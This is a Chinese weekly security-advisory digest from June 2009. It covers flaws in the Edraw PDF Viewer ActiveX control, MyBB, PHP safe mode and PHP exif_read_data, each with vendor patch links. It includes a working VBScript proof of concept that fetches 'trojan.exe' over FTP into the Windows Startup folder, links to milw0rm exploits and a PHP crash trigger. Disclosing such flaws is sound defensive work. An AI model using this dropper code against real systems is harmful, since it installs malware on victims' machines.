当前位置: 安全纵横 > 安全公告

一周业界安全动态(6月15日-6月21日)

来源:安恒信息 日期:2009-06

Edraw PDF Viewer Component任意文件上传漏洞
受影响系统:
EDraw PDF Viewer Component 3.2
不受影响系统:
EDraw PDF Viewer Component 3.2.0.126
描述:
BUGTRAQ? ID: 35428
Edraw PDF Viewer Component是轻型的ActiveX空间,允许应用程序显示和操作PDF文件。
PDFVIEWER.PDFViewerCtrl.1 ActiveX控件(pdfviewer.ocx)所提供的FtpDownloadFile()方式没有正确地验证用户所提供的输入参数,如果用户受骗访问了恶意网页,就可能向系统上的任意位置下载文件。
测试方法
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
<BR><object classid="clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04" id="target" width="67" height="50" codebase="http://www.ocxt.com/download/officeviewer.cab#6,0,612,1"></object>
<BR><BR>
<script language="vbscript">
target.FtpConnect "ftp://192.168.220.201", "test", "tester"
target.FtpDownloadFile "trojan.exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\trojan.exe"
target.FtpDisConnect
</script>
</body>
</html>
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.ocxt.com/

 

MyBB <= 1.4.6 远程代码执行漏洞
受影响系统:
MyBB <= 1.4.6
描述:
MyBB是一款流行的Web论坛程序。
MyBB没有正确地验证用户请求中提交给inc/datahandlers/user.php模块的birthdayprivacy参数,远程攻击者可以通过向论坛提交恶意请求执行SQL注入攻击,导致获得论坛的管理权限。成功利用这个漏洞要求打开了Mybb的不可视模式且拥有有效的登录凭据。
测试方法
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://milw0rm.com/exploits/9001
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://blog.mybboard.net/2009/06/15/mybb-147-released-security-update/

 

PHP多个函数绕过安全模式限制漏洞
受影响系统
PHP <= 5.2.10
描述:
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
在安全模式下,PHP没有禁用exec()、system()、passthru()和popen()这四个函数,只是在safe_mode_exec_dir目录下执行。但当safe_mode=on且safe_mode_exec_dir为空时(默认),PHP在处理这一过程中存在安全隐患,在windows下exec()/system()/passthru()可以通过引入“\”来执行程序。
....
测试方法
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.milw0rm.com/exploits/8799
http://www.milw0rm.com/sploits/2009-safemod-windows.zip
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://bugs.php.net/bug.php?id=45997

 

PHP exif_read_data()函数拒绝服务漏洞
受影响系统:
PHP 5.2.x
不受影响系统:
PHP 5.2.10
描述:
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的exif_read_data()函数未经任何验证便从JPEG图形文件中读取了表示偏移的字段,用户受骗打开恶意的JPEG图形就可能触发分段错误,导致拒绝服务的情况。
测试方法
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
var_dump(exif_read_data($_SERVER['argv'][1], array("FILE", "COMPUTED",
"ANY_TAG") ));
http://www.noloop.net/bugs/php/001-exif/hello-s148.jpeg
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.php.net/get/php-5.2.10.tar.bz2/from/a/mirror